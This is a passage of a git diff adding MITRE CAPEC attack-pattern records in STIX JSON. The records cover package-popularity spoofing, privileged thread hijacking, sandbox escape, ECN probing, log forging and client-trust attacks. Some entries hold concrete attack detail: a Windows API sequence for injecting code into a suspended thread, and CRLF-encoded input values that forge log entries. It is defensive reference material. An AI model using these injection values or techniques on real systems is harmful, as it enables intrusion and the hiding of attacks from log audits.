Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL 
actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

  1. Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

  1. Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

  2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage the malicious package.
", + "x_capec_extended_description": "\n Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of \"Stars\" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source package whose popularity metadata is to be used for the malicious package." + ], + "x_capec_skills_required": { + "Low": "Ability to provide a package to a package manager and associate a popular package's source code repository URL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json new file mode 100644 index 0000000000000000000000000000000000000000..01e517aaeea13041bc2528c111ef35cc613cc877 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json 
@@ -0,0 +1,80 @@ +{ + "id": "bundle--3099ae46-1773-4ae9-919b-d43860f0b4c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process's memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.", + "external_references": [ + { + "external_id": "CAPEC-30", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/30.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Process Injection: Thread Execution Hijacking", + "external_id": "T1055.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055/003" + } + ], + "id": "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a Privileged Thread of Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + 
"x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target thread: The adversary determines the underlying system thread that is subject to user-control

Experiment

  1. Gain handle to thread: The adversary then gains a handle to a process thread.

  2. Techniques
    Use the \"OpenThread\" API call in Windows on a known thread.
    Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it.
  3. Alter process memory: Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.

  4. Techniques
    On Windows, use \"SuspendThread\" followed by \"VirtualAllocEx\", \"WriteProcessMemory\", and \"SetThreadContext\".

Exploit

  1. Resume thread execution: Once the process memory has been altered to execute malicious code, the thread is then resumed.

  2. Techniques
    On Windows, use \"ResumeThread\".
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users", + "In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute." + ], + "x_capec_resources_required": [ + "\n None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.\n The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.\n " + ], + "x_capec_skills_required": { + "High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json new file mode 100644 index 0000000000000000000000000000000000000000..312a26caac6a38f0a529024ce82c806a5993b709 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json 
@@ -0,0 +1,82 @@ +{ + "id": "bundle--161a4750-7b0f-439b-bc16-52a91b6ca1ab", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. 
Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. 
The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.
  3. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

  4. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

  2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

  2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json new file mode 100644 index 0000000000000000000000000000000000000000..8bea3767c9f35f685aeaaa96414beeaf2e92bd3a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json 
@@ -0,0 +1,79 @@ +{ + "id": "bundle--d016bee5-1b82-4f60-9ee8-cb0eb6abec24", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json new file mode 100644 index 0000000000000000000000000000000000000000..093e3b86e4ee50107724f27358142daaaba35fc0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json 
@@ -0,0 +1,96 @@ +{ + "id": "bundle--7caa88f1-6bd6-4209-93bf-d91f40a28b42", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "external_id": "CAPEC-93", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "A. 
Muffet, The night the log was forged", + "external_id": "REF-550", + "source_name": "reference_from_CAPEC", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm" + }, + { + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "external_id": "REF-551", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Log_Injection" + }, + { + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-552", + "source_name": "reference_from_CAPEC", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579" + } + ], + "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. 
See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

  2. Techniques
    Determine logging utility being used by application (e.g. log4j)
    Gain access to application's source code to determine log file formats.
    Install or obtain access to instance of application and observe its log file format.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
    \n Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:\n \"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"\n may add the following forged entry into a log file:\n \"[Thu Nov 12 12:11:22]:Info: User admin logged in\"\n Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain\n \n The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).\n
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json new file mode 100644 index 0000000000000000000000000000000000000000..0adfc4ca674227307037d43757d796f2b2569a43 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json 
@@ -0,0 +1,54 @@ +{ + "id": "bundle--7b19d034-8d59-40d7-9c83-0f32234159e3", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json new file mode 100644 index 0000000000000000000000000000000000000000..0d7af18dc5d8bf88acbc83efee92a0ae86841c27 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json 
@@ -0,0 +1,51 @@ +{ + "id": "bundle--42c98d54-1d1e-48f8-9d38-50fd2e900b9a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json new file mode 100644 index 0000000000000000000000000000000000000000..7713ae347944f2fa6193c9695caf7b9b4b5e9e8a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json 
@@ -0,0 +1,105 @@ +{ + "id": "bundle--dd2653e7-cf1d-47c1-b86f-ece068181966", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. 
Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." 
+ ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json new file mode 100644 index 